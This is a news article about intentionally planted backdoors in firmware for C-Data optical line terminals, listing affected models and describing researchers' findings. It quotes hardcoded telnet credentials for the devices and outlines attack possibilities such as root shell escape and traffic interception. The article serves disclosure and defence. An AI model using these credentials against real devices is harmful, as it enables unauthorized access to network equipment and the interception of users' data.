Chinese Vendor of OLT Devices Loads them with Firmware Backdoors

Last updated July 10, 2020
Written by:
Bill Toulas
Bill Toulas
Infosec Writer

“C-Data”, a Chinese manufacturer of network equipment was “caught” by security researchers Pierre Kim and Alexandre Torres, who found intentionally planted backdoors in OLT (optical line terminal) firmware. These devices are basically used by network engineers to “terminate” the optical line and convert it to an Ethernet connection. This is why these terminals are typically found nearby or inside buildings, offices, homes, and the end-user in general. “C-Data” is selling these OLTs under its brand, or as “OptiLink”, “V-SOL CN”, or “BLIY”.

gpon-olt-1608sn-solution-01

Source: C-Data

The researchers tested C-Data models “FD1104B” and “FD1108SN” in the lab and figured that firmware versions V1.2.2 and 2.4.05_000, 2.4.04_001 and 2.4.03_000 contain the backdoors. Upon further analysis, the team figured that the following models are affected by this critical security problem:

List of Affected Models
72408A FD1104B
9008A FD1104S
9016A FD1104SN
92408A FD1108S
92416A FD1204S-R2
9288 FD1204SN
97016 FD1204SN-R2
97024P FD1208S-R2
97028P FD1216S-R1
97042P FD1608GS
97084P FD1608SN
97168P FD1616GS
FD1002S FD1616SN
FD1104 FD8000

c-data olt

Source: C-DataThe backdoor was planted intentionally without a doubt and allows a remote user to connect to the clients that are linked with the OLT via a telnet server. The firmware contains hardcoded credentials like “debug” + “debug124” or “root” + “root126”, which would be easy to brute-force even from people who don’t work in C-Data.

authentication

Source: pierrekim.github.io

Once the attacker has established presence through telnet, there are various things they can do next. One would be to extract the administrator credentials, another would be to escape the shell with root privileges, and other exploitation scenarios could involve the launching of pre-auth remote denial of service attacks. As the researcher explains, all of the above are pretty easy to carry out by running simple commands. MITM and password interception that would exfiltrate data in clear text form would be entirely possible, and a grave scenario for the end-user.

The researchers didn’t bother contacting the vendor of the devices and waiting for a response, a patch, going through retesting rounds, etc., as they believe the vulnerabilities were intentionally planted. Thus, they just published everything for the networking engineers to take note of and do the needful. C-Data hasn’t issued an official response on the above, and it will surely be very hard for their PR to explain all that. As for what the end-user can do, the answer is not much other than informing your ISP and demanding their technicians to double-check what equipment they’re using.

Read More:



For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: